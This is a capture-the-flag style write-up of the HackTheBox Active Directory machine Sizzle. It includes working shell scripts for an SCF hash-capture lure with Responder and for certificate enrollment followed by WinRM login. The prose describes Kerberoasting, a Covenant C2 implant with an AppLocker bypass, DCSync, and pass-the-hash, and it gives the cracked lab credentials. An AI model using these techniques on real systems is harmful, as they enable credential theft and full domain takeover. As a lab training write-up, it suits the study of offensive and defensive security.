# HackTheBox - Sizzle - 10.10.10.103

Sizzle is an insane rated Active Directory machine on hackthebox.eu.

## Summary

Sizzle is an Insane difficulty Windows Active Directory box. A writable directory in an SMB share lets us steal a NetNTLMv2 hash, which cracks to a password that gives access to the Certificate Services web enrollment portal. A certificate issued by the CA can then be used for client-certificate authentication to WinRM. An SPN set on a user account allows a Kerberoast attack on the box. That user turns out to hold replication rights, which can be abused to get the Administrator hash via DCSync.

## Recon and Scanning

### Nmap Results

Based on the open ports I can deduce that this is a Windows domain controller.

### FTP - Anonymous Logon

The nmap scan reports that anonymous FTP login is allowed.

Nothing of use on FTP.

### SMB Enumeration

Two writable folders are identified:

The Certificate Services web enrollment page (/certsrv) prompts for credentials, so we need a valid account before we can use the certificate authority.

## Stealing a Users Hash

To steal a user's hash we can drop a malicious .scf file into one of the writable folders. When a user merely browses that folder, Explorer tries to load the icon the file points at over SMB and authenticates to our host; Responder answers the connection and captures the NetNTLMv2 hash. The user never has to open the file.

### Cracking the Hash

Firstly, copy the captured hash to a file and run john against it with rockyou.txt (the NetNTLMv2 format is recognised automatically).

We get the credentials, amanda:Ashare1972
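The SCF lure, upload, capture and crack steps above, as an added example that is not part of the original writeup. The attacker address 10.10.14.5, the interface tun0, the share name and folder (`$SHARE`, `$DIR`) and the `lure.ico` name are placeholders, not values from the page; only the SCF generation and read-back run offline, the upload, Responder and john calls need the respective tools and the target.

```sh
#!/bin/sh
# Added example, not the writeup's own commands: build the SCF lure, push it to the
# writable share folder, capture the NetNTLMv2 response with Responder and crack it.
# Assumptions (placeholders, not from the page): attacker address 10.10.14.5 on tun0,
# share name "$SHARE" and folder "$DIR". Only make_scf/scf_icon_path run offline.

# Write an SCF file whose IconFile points at our SMB listener. Explorer fetches the
# icon as soon as the folder is listed, so the victim never has to open the file.
# Naming it "@something.scf" sorts it to the top of the directory listing.
make_scf() {
    attacker_ip="$1"
    out="$2"
    # Windows wants CRLF line endings and backslashes; printf keeps them literal.
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\share\\lure.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' \
        "$attacker_ip" > "$out"
}

# Read back the IconFile UNC path from a generated SCF (CR stripped), to verify the lure.
scf_icon_path() {
    sed -n 's/^IconFile=//p' "$1" | tr -d '\r'
}

# Drop the lure into the writable folder of the share (anonymous write assumed).
upload_scf() {
    target="$1"; share="$2"; dir="$3"; scf="$4"
    smbclient "//$target/$share" -N -c "cd \"$dir\"; put \"$scf\""
}

# Responder answers the SMB connection and logs the NetNTLMv2 blob under
# /usr/share/responder/logs/ (normally a file named SMB-NTLMv2-SSP-<ip>.txt).
capture() {
    sudo responder -I "${1:-tun0}" -v
}

# Crack the captured hash; the format flag is optional but keeps john from guessing.
crack() {
    john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt "$1"
}

# The full flow only runs when asked for, so the file can also be sourced for its helpers.
if [ "${SCF_RUN:-0}" = 1 ]; then
    make_scf "${ATTACKER_IP:-10.10.14.5}" "@lure.scf"
    upload_scf 10.10.10.103 "$SHARE" "$DIR" "@lure.scf"
    capture tun0
fi
```

Run with `SCF_RUN=1 SHARE='...' DIR='...' sh scf.sh`, then `crack /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.103.txt` once a hash has landed. The `Command=2` and `ToggleDesktop` lines are what make Explorer treat the file as a shell command file; the UNC path in `IconFile` is the only part that needs to point at the attacker.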

### Generating a Certificate

Now let's log in to /certsrv, the AD Certificate Services web enrollment page, with amanda's credentials and request a certificate. The key pair stays on our side: generate a key and CSR locally, submit the base64 CSR through the advanced request form, and download the issued certificate.

Now we can use this certificate together with its private key to log in over WinRM. Certificate authentication only works on the HTTPS listener, so the connection goes over TLS.
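The CSR, enrollment and WinRM steps above, as an added example that is not part of the original writeup. It assumes the enrollment pages are reachable at http://10.10.10.103/certsrv/ and that the form fields (`Mode`, `CertRequest`, `CertAttrib`, `TargetStoreFlags`, `SaveCert`) and the `certnew.cer?ReqID=...&Enc=b64` download link are those of the standard AD CS `certfnsh.asp` page, which is an assumption about the portal rather than something the page shows; the `User` template name is likewise assumed. Credentials are the ones cracked above; `openssl`, `curl` and `evil-winrm` must be installed locally.

```sh
#!/bin/sh
# Added example, not the writeup's own commands: request a user certificate from the
# AD CS web enrollment pages with amanda's credentials, then use it for WinRM over TLS.
# Assumptions: enrollment at http://10.10.10.103/certsrv/, standard certfnsh.asp form
# field names, the "User" template, and evil-winrm installed. Needs openssl and curl.

TARGET="${TARGET:-10.10.10.103}"
USER_NAME="${USER_NAME:-amanda}"
PASSWORD="${PASSWORD:-Ashare1972}"

# Generate a private key and a CSR whose CN is the account name. The key never
# leaves our machine; only the CSR is sent to the CA.
gen_csr() {
    name="$1"; dir="$2"
    openssl req -newkey rsa:2048 -nodes -keyout "$dir/$name.key" \
        -subj "/CN=$name" -out "$dir/$name.csr" 2>/dev/null
}

# First line of a PEM file, used to sanity-check what we produced or downloaded.
pem_header() { head -n 1 "$1"; }

# Submit the CSR through certfnsh.asp over NTLM and fetch the issued certificate.
# On success the response contains a link like certnew.cer?ReqID=<n>&Enc=b64.
submit_csr() {
    name="$1"; dir="$2"
    resp=$(curl -s --ntlm -u "$USER_NAME:$PASSWORD" \
        "http://$TARGET/certsrv/certfnsh.asp" \
        --data-urlencode "Mode=newreq" \
        --data-urlencode "CertRequest=$(cat "$dir/$name.csr")" \
        --data-urlencode "CertAttrib=CertificateTemplate:User" \
        --data-urlencode "TargetStoreFlags=0" \
        --data-urlencode "SaveCert=yes")
    req_id=$(printf '%s' "$resp" | grep -o 'certnew.cer?ReqID=[0-9]*' | head -n 1 | sed 's/.*ReqID=//')
    if [ -z "$req_id" ]; then
        echo "enrollment failed: no ReqID in response (bad credentials or template not allowed?)" >&2
        return 1
    fi
    curl -s --ntlm -u "$USER_NAME:$PASSWORD" \
        "http://$TARGET/certsrv/certnew.cer?ReqID=$req_id&Enc=b64" -o "$dir/$name.cer"
}

# Client-certificate logon: -S selects the HTTPS listener (5986), -c/-k are the
# public certificate and the private key that belongs to it.
winrm_with_cert() {
    name="$1"; dir="$2"
    evil-winrm -i "$TARGET" -S -c "$dir/$name.cer" -k "$dir/$name.key"
}

# Only talk to the target when explicitly asked; otherwise just define the helpers.
if [ "${RUN_ENROLL:-0}" = 1 ]; then
    work=$(mktemp -d)
    gen_csr "$USER_NAME" "$work" && submit_csr "$USER_NAME" "$work" && winrm_with_cert "$USER_NAME" "$work"
fi
```

Run with `RUN_ENROLL=1 sh enroll.sh`. If `submit_csr` reports no ReqID, open the HTML it received: the portal states whether the request was denied, pending, or submitted with a template the account cannot enroll in.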

## Covenant C2 Framework

To get a better overview of the AD environment we will use Covenant; you can install it following the guide here.

Next, generate a listener and then a binary grunt. Host it on the HTTP listener, download it on the box into an AppLocker bypass directory such as C:\Windows\System32\spool\drivers\color (writable by normal users, yet still covered by the default allow rule for C:\Windows) and execute it; you should then receive a grunt back.

### Kerberoast

The enumeration shows an SPN set on the user account mrlky, which means we can Kerberoast it to get a crackable TGS hash. The WinRM session does not carry amanda's password, so ticket requests from it fail; firstly, we need to create a logon token with her credentials using the following command

Now that we have the hash we can attempt to crack it with john: `john mrlky-tgt -w=/usr/share/wordlists/rockyou.txt`

Bingo, we now have the following credentials, mrlky:Football#7

We can now repeat the certificate request, the WinRM login and the Covenant grunt deployment as mrlky.

## Priv Esc from Mrlky

Now that we have a grunt loaded as mrlky, we can continue to enumerate the domain

### PowerView Enumeration

Firstly, we will load up PowerView and look for principals that hold replication rights on the domain object, that is the extended rights DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2).

We can see that mrlky has DS-Replication-Get-Changes-All, the right that lets a caller pull secrets such as password hashes over the replication RPC (DCSync needs it alongside the plain Get-Changes right). So we can perform a DCSync attack from Covenant to get the Administrator hash.

### DCSync

Since we can DCSync, we use Covenant's DCSync command to retrieve the Administrator hash.

Now we can pass the LM and NT hashes to wmiexec (pass-the-hash) to get a shell as Administrator.

## After Root

Now that we have rooted the box I will use Covenant to get a grunt as SYSTEM, dump all of the domain hashes, and clean up the files left behind, as I would on a real engagement.

Firstly let’s execute the pwn.exe to give us a grunt as SYSTEM

Now head over to the Interact Tab and run

Now that we have all of the domain hashes the box is fully complete. Reset it, or remove every file we placed on it, so that anyone else who wants to pwn the box gets a fair shot at it.

## User and Root Flags

We can also now get the root and user flags.

